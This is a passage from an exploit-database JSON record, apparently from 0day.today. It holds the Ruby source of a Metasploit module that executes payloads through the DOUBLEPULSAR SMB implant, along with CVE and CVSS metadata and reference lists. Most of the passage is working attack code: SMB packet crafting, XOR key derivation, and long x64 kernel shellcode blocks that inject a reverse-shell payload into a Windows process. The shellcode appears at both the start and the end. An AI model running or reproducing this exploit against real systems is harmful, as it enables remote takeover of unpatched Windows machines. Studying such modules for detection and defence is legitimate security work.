\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-15] #"}, "lastseen": "2021-10-14T22:26:47", "differentElements": ["sourceData"], "edition": 45}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f9b5a123d6111ab2141c57d3654c482d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-15T22:18:06", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-15T22:18:06", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-15T22:18:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n 